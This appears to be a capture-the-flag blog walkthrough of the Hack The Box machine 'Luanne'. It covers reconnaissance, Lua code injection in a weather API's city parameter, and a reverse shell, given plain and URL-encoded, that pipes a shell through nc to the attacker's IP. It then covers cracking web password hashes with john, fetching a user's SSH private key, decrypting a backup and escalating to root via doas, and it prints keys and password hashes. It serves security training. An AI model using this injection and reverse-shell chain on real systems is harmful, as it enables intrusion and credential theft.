Hack-The-Box-walkthrough[luanne]

Posted on 2020-12-04 Edited on 2021-03-29 In HackTheBox walkthrough Views: Word count in article: 3k Reading time ≈ 11 mins.

introduce

OS: Other
Difficulty: Easy
Points: 20
Release: 28 Nov 2020
IP: 10.10.10.218

information gathering

first use nmap as usaul

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.218
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
80/tcp   open  http    nginx 1.19.0
9001/tcp open  http    Medusa httpd 1.12 (Supervisor process manager)
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# nmap -sV -sC -v -p 22,80,9001 10.10.10.218
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey: 
|   3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
|   521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_  256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp   open  http    nginx 1.19.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=.
| http-methods: 
|_  Supported Methods: GET HEAD POST
| http-robots.txt: 1 disallowed entry 
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open  http    Medusa httpd 1.12 (Supervisor process manager)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

Port-80

They asking us for a username and Password.

If we see in our nmap result they tell us about robots.txt.

Let’s check out that quickly

1 2	User-agent: * Disallow: /weather #returning 404 but still harvesting cities

There is a one directory called /weather in the disallow entries.

Let’s check that directory.

Hmm they said 404 not found.

Let’s use gobuster to find inside /weather directory.

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# gobuster dir -u http://10.10.10.218/weather/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.218/weather/
[+] Threads:        50
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/04 01:40:43 Starting gobuster
===============================================================
/forecast (Status: 200)

they found one more interesting directory called /forecast

They said no city specified use city=list.

Let’s use this in the url.

1
2
3

http://10.10.10.218/weather/forecast?city=list

{"code": 200,"cities": ["London","Manchester","Birmingham","Leeds","Glasgow","Southampton","Liverpool","Newcastle","Nottingham","Sheffield","Bristol","Belfast","Leicester"]}

They list all cities Let’s choose Leeds.

1
2
3

http://10.10.10.218/weather/forecast?city=Leeds

{"code": 200,"city": "Leeds","list": [{"date": "2020-12-04","weather": {"description": "snowy","temperature": {"min": "12","max": "46"},"pressure": "1799","humidity": "92","wind": {"speed": "2.1975513692014","degree": "102.76822959445"}}},{"date": "2020-12-05","weather": {"description": "partially cloudy","temperature": {"min": "15","max": "43"},"pressure": "1365","humidity": "51","wind": {"speed": "4.9522297247313","degree": "262.63571172766"}}},{"date": "2020-12-06","weather": {"description": "sunny","temperature": {"min": "19","max": "30"},"pressure": "1243","humidity": "13","wind": {"speed": "1.8041767538525","degree": "48.400944394059"}}},{"date": "2020-12-07","weather": {"description": "sunny","temperature": {"min": "30","max": "34"},"pressure": "1513","humidity": "84","wind": {"speed": "2.6126398323104","degree": "191.63755226741"}}},{"date": "2020-12-08","weather": {"description": "partially cloudy","temperature": {"min": "30","max": "36"},"pressure": "1772","humidity": "53","wind": {"speed": "2.7699138359167","degree": "104.89152945159"}}}]}

Nothing interesting in the output.

After some hit and try and reading the hackthebox forums they all talking about lua. i think lua is related to the machiene name.

Let’s try some lua syntax.

1	http://10.10.10.218/weather/forecast?city=Leeds%22);%27print(

They give us a error called:

1	<br>Lua error: /usr/local/webapi/weather.lua:49: attempt to call a nil value

Now i am conform that we get the reverse shell with lua.

gtfobins-lua
mkfifo

After reading some article i create a syntax for reverse shell.

1	http://10.10.10.218/weather/forecast?city=Leeds');os.execute("rm /tmp/f;mkfifo /tmp/luci;cat /tmp/luci\|/bin/sh -i 2>&1\|nc 10.10.14.3 9001 >/tmp/luci")--

Url encode this to the following

http://10.10.10.218/weather/forecast?city=Leeds%27%29%3b%6f%73%2e%65%78%65%63%75%74%65%28%22%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%6c%75%63%69%3b%63%61%74%20%2f%74%6d%70%2f%6c%75%63%69%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%30%2e%31%34%2e%33%20%39%30%30%31%20%3e%2f%74%6d%70%2f%6c%75%63%69%22%29%2d%2d

Open your netcat listner.

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# nc -lvp 9001                                                                                                
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.218.
Ncat: Connection from 10.10.10.218:65489.
sh: can't access tty; job control turned off
$ id
uid=24(_httpd) gid=24(_httpd) groups=24(_httpd)
$ whoami
_httpd

Boom we got the reverse shell through _httpd.

After some enumeration i find an interesting file called .htpasswd in /var/www/

ls -la
$ total 20
drwxr-xr-x   2 root  wheel  512 Nov 25 11:27 .
drwxr-xr-x  24 root  wheel  512 Nov 24 09:55 ..
-rw-r--r--   1 root  wheel   47 Sep 16 15:07 .htpasswd
-rw-r--r--   1 root  wheel  386 Sep 17 20:56 index.html
-rw-r--r--   1 root  wheel   78 Nov 25 11:38 robots.txt
$ cat .htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

There is a webapi_user hash.

Let’s try to crack it with john.

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# john -w=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iamthebest       (?)
1g 0:00:00:00 DONE (2020-12-04 02:01) 7.142g/s 21942p/s 21942c/s 21942C/s my3kids..ANTHONY
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And we got the password for webapi_user:iamthebest.

But the problem is su or sudo is not working

Let’s use this credentials on web.

1	webapi_user:iamthebest

There is nothing interesting.

Let’s do manually enumeration inside the box.

Let’s check which service running inside the box

$ netstat -ant
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        State
tcp        0      0  10.10.10.218.65489     10.10.14.3.9001        ESTABLISHED
tcp        0      0  127.0.0.1.3000         127.0.0.1.65490        CLOSE_WAIT
tcp        0      0  127.0.0.1.65490        127.0.0.1.3000         FIN_WAIT_2
tcp        0      0  127.0.0.1.3000         *.*                    LISTEN
tcp        0      0  127.0.0.1.3001         *.*                    LISTEN
tcp        0      0  *.80                   *.*                    LISTEN
tcp        0      0  *.22                   *.*                    LISTEN
tcp        0      0  *.9001                 *.*                    LISTEN
Active Internet6 connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp6       0      0  *.22                   *.*                    LISTEN
Active UNIX domain sockets
Address  Type   Recv-Q Send-Q    Inode     Conn     Refs  Nextref Addr
fffff67d7a76b9e0 stream      0      0        0 fffff67d7a76b900        0        0 
fffff67d7a76b900 stream      0      0        0 fffff67d7a76b9e0        0        0 
fffff67d7a76b510 stream      0      0 fffff67e28af5c08        0        0        0 /var/supervisord/run/supervisord.sock.340
fffff67d7a76bdd0 dgram       0      0        0 fffff67d7a76b3c0        0 fffff67d7a76bb30 -> /var/run/log
fffff67d7a76b7b0 dgram       0      0        0 fffff67d7a76b3c0        0        0 -> /var/run/log
fffff67d7a76b820 dgram       0      0        0        0        0        0 
fffff67d7a76bb30 dgram       0      0        0 fffff67d7a76b3c0        0 fffff67d7a76b7b0 -> /var/run/log
fffff67d7a76b3c0 dgram       0      0 fffff67e2b920040        0 fffff67d7a76bdd0        0 /var/run/log

There is a port called 3001 that run in the localhost Let’s check this real quick.

$ nc 127.0.0.1 3001
cat /etc/passwd
HTTP/0.9 404 Not Found
Content-Type: text/html
Content-Length: 217
Server: bozohttpd/20190228

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found</h1>
/etc/passwd: <pre>This item has not been found</pre>
<hr><address><a href="//luanne.htb:3001/">luanne.htb:3001</a></address>
</body></html>

Let’s curl that web server inside the machiene.

$ curl http://127.0.0.1:3000/
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   199  100   199    0     0  99500      0 --:--:-- --:--:-- --:--:-- 99500
<html><head><title>401 Unauthorized</title></head>
<body><h1>401 Unauthorized</h1>
/: <pre>No authorization</pre>
<hr><address><a href="//127.0.0.1:3000/">127.0.0.1:3000</a></address>
</body></html>

It said Unauthorized Let’s try those credentials which we cracked.

$ curl --user webapi_user:iamthebest http://127.0.0.1:3001/
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   386  100   386    0     0   125k      0 --:--:-- --:--:-- --:--:--  125k
<!doctype html>
<html>
  <head>
    <title>Index</title>
  </head>
  <body>
    <p><h3>Weather Forecast API</h3></p>
    <p><h4>List available cities:</h4></p>
    <a href="/weather/forecast?city=list">/weather/forecast?city=list</a>
    <p><h4>Five day forecast (London)</h4></p>
    <a href="/weather/forecast?city=London">/weather/forecast?city=London</a>
    <hr>
  </body>
</html>

After some hit and try i find a way to get id_rsa file.

First Let’s check /etc/passwd file which user has in the box.

$ cat /etc/passwd
root:*:0:0:Charlie &:/root:/bin/sh
toor:*:0:0:Bourne-again Superuser:/root:/bin/sh
daemon:*:1:1:The devil himself:/:/sbin/nologin
operator:*:2:5:System &:/usr/guest/operator:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
games:*:7:13:& pseudo-user:/usr/games:/sbin/nologin
postfix:*:12:12:& pseudo-user:/var/spool/postfix:/sbin/nologin
named:*:14:14:& pseudo-user:/var/chroot/named:/sbin/nologin
ntpd:*:15:15:& pseudo-user:/var/chroot/ntpd:/sbin/nologin
sshd:*:16:16:& pseudo-user:/var/chroot/sshd:/sbin/nologin
_pflogd:*:18:18:& pseudo-user:/var/chroot/pflogd:/sbin/nologin
_rwhod:*:19:19:& pseudo-user:/var/rwho:/sbin/nologin
_proxy:*:21:21:Proxy Services:/nonexistent:/sbin/nologin
_timedc:*:22:22:& pseudo-user:/nonexistent:/sbin/nologin
_sdpd:*:23:23:& pseudo-user:/nonexistent:/sbin/nologin
_httpd:*:24:24:& pseudo-user:/var/www:/sbin/nologin
_mdnsd:*:25:25:& pseudo-user:/nonexistent:/sbin/nologin
_tests:*:26:26:& pseudo-user:/nonexistent:/sbin/nologin
_tcpdump:*:27:27:& pseudo-user:/var/chroot/tcpdump:/sbin/nologin
_tss:*:28:28:& pseudo-user:/var/tpm:/sbin/nologin
_rtadvd:*:30:30:& pseudo-user:/var/chroot/rtadvd:/sbin/nologin
_unbound:*:32:32:& pseudo-user:/var/chroot/unbound:/sbin/nologin
_nsd:*:33:33:& pseudo-user:/var/chroot/nsd:/sbin/nologin
uucp:*:66:1:UNIX-to-UNIX Copy:/nonexistent:/sbin/nologin
nobody:*:32767:39:Unprivileged user:/nonexistent:/sbin/nologin
r.michaels:*:1000:100::/home/r.michaels:/bin/ksh
nginx:*:1001:1000:NGINX server user:/var/db/nginx:/sbin/nologin
dbus:*:1002:1001:System message bus:/var/run/dbus:/sbin/nologin

try and random guess, There is a user called r.michaels.

Let’s grep his id_rsa file.

$ curl --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/id_rsa
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2610  100  2610    0     0   637k      0 --:--:-- --:--:-- --:--:--  637k
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Let’s ssh inside the box.

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# chmod 600 id_rsa 
┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# ssh -i id_rsa r.michaels@10.10.10.218
The authenticity of host '10.10.10.218 (10.10.10.218)' can't be established.
ECDSA key fingerprint is SHA256:KB1gw0t+80YeM3PEDp7AjlTqJUN+gdyWKXoCrXn7AZo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.218' (ECDSA) to the list of known hosts.
Last login: Fri Sep 18 07:06:51 2020
NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020

Welcome to NetBSD!

luanne$ id
uid=1000(r.michaels) gid=100(users) groups=100(users)
luanne$ whoami
r.michaels
luanne$ ls
backups     devel       public_html user.txt
luanne$ cat user.txt
ea5f0ce6a917b0be1eabc7f9218febc0

and we got user.txt

Now let me explain why ~r.michaels/.ssh/id_rsa is not work.

If we see the r.michaels home directory there is a folder called public_html and inside this there is a id_rsa file

So this folder is shared through web so we can access the public_html folder.

luanne$ ls
backups     devel       public_html user.txt
luanne$ cd public_html/                                                                                        
luanne$ ls
id_rsa

Privilege escalation

I found an interesting file called devel_backup-2020-09-16.tar.gz.enc inside backups on r.michaels directory.

luanne$ pwd
/home/r.michaels/backups
luanne$ ls
devel_backup-2020-09-16.tar.gz.enc

But it’s a .enc file so we can’t extract it with tar -xf.

After some google search i found a way to extract the file of .enc.

1	netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/devel_backup-2020-09-16.tar.gz

luanne$ netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/devel_backup-2020-09-16.tar.gz
signature  2048/RSA (Encrypt or Sign) 3684eb1e5ded454a 2020-09-14 
Key fingerprint: 027a 3243 0691 2e46 0c29 9f46 3684 eb1e 5ded 454a 
uid              RSA 2048-bit key <r.michaels@localhost>
luanne$ cd /tmp
luanne$ ls
devel_backup-2020-09-16.tar.gz

Now it’s a .tar.gz file so we can extract it with tar -xf.

luanne$ cd /tmp
luanne$ ls
devel_backup-2020-09-16.tar.gz
luanne$ tar -xf devel_backup-2020-09-16.tar.gz
luanne$ ls
devel-2020-09-16                     devel_backup-2020-09-16.tar.gz
luanne$ cd devel-2020-09-16
luanne$ ls
webapi www
luanne$ cd www
luanne$ ls
index.html
luanne$ ls -la
total 32
drwxr-xr-x  2 r.michaels  wheel   96 Sep 16 15:03 .
drwxr-x---  4 r.michaels  wheel   96 Sep 16 15:02 ..
-rw-r--r--  1 r.michaels  wheel   47 Sep 16 18:14 .htpasswd
-rw-r--r--  1 r.michaels  wheel  378 Sep 16 15:03 index.html
luanne$ cat .htpasswd
webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

We got another hash but this is different from previous hash.

1	webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

Let’s try to crack this hash with john.

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# john -w=/usr/share/wordlists/rockyou.txt hash1
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
littlebear       (?)
1g 0:00:00:00 DONE (2020-12-04 02:24) 16.66g/s 217600p/s 217600c/s 217600C/s jayar..hello11
Use the "--show" option to display all of the cracked passwords reliably
Session completed

and we got the pass

1	webapi_user:littlebear

We got the password littlebear

But the problem is we cant change the user because sudo is not working.

After some google search i found the way to switch the user to root.

doas — execute commands as another user

luanne$ doas -u root /bin/sh
Password:
sh: Cannot determine current working directory
# id
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)
# whoami
root
# pwd
pwd: getcwd() failed: No such file or directory
# cat /root/root.txt
7a9b5c206e8e8ba09bb99bd113675f66

and we got root.txt, and finished the box.

root hash:

# cat master.passwd
root:$sha1$23801$4UJhvV0t$hToalyVeYBLnwnyB6uvsIJfPPCC4:0:0::0:0:Charlie &:/root:/bin/sh
toor:*:0:0::0:0:Bourne-again Superuser:/root:/bin/sh
daemon:*:1:1::0:0:The devil himself:/:/sbin/nologin
operator:*:2:5::0:0:System &:/usr/guest/operator:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/sbin/nologin
games:*:7:13::0:0:& pseudo-user:/usr/games:/sbin/nologin
postfix:*:12:12::0:0:& pseudo-user:/var/spool/postfix:/sbin/nologin
named:*:14:14::0:0:& pseudo-user:/var/chroot/named:/sbin/nologin
ntpd:*:15:15::0:0:& pseudo-user:/var/chroot/ntpd:/sbin/nologin
sshd:*:16:16::0:0:& pseudo-user:/var/chroot/sshd:/sbin/nologin
_pflogd:*:18:18::0:0:& pseudo-user:/var/chroot/pflogd:/sbin/nologin
_rwhod:*:19:19::0:0:& pseudo-user:/var/rwho:/sbin/nologin
_proxy:*:21:21::0:0:Proxy Services:/nonexistent:/sbin/nologin
_timedc:*:22:22::0:0:& pseudo-user:/nonexistent:/sbin/nologin
_sdpd:*:23:23::0:0:& pseudo-user:/nonexistent:/sbin/nologin
_httpd:*:24:24::0:0:& pseudo-user:/var/www:/sbin/nologin
_mdnsd:*:25:25::0:0:& pseudo-user:/nonexistent:/sbin/nologin
_tests:*:26:26::0:0:& pseudo-user:/nonexistent:/sbin/nologin
_tcpdump:*:27:27::0:0:& pseudo-user:/var/chroot/tcpdump:/sbin/nologin
_tss:*:28:28::0:0:& pseudo-user:/var/tpm:/sbin/nologin
_rtadvd:*:30:30::0:0:& pseudo-user:/var/chroot/rtadvd:/sbin/nologin
_unbound:*:32:32::0:0:& pseudo-user:/var/chroot/unbound:/sbin/nologin
_nsd:*:33:33::0:0:& pseudo-user:/var/chroot/nsd:/sbin/nologin
uucp:*:66:1::0:0:UNIX-to-UNIX Copy:/nonexistent:/sbin/nologin
nobody:*:32767:39::0:0:Unprivileged user:/nonexistent:/sbin/nologin
r.michaels:$sha1$24334$unLQu/.W$CtjrV4vz9ansOLIXDJMlzu1gSPC3:1000:100::0:0::/home/r.michaels:/bin/ksh
nginx:*************:1001:1000::0:0:NGINX server user:/var/db/nginx:/sbin/nologin
dbus:*************:1002:1001::0:0:System message bus:/var/run/dbus:/sbin/nologin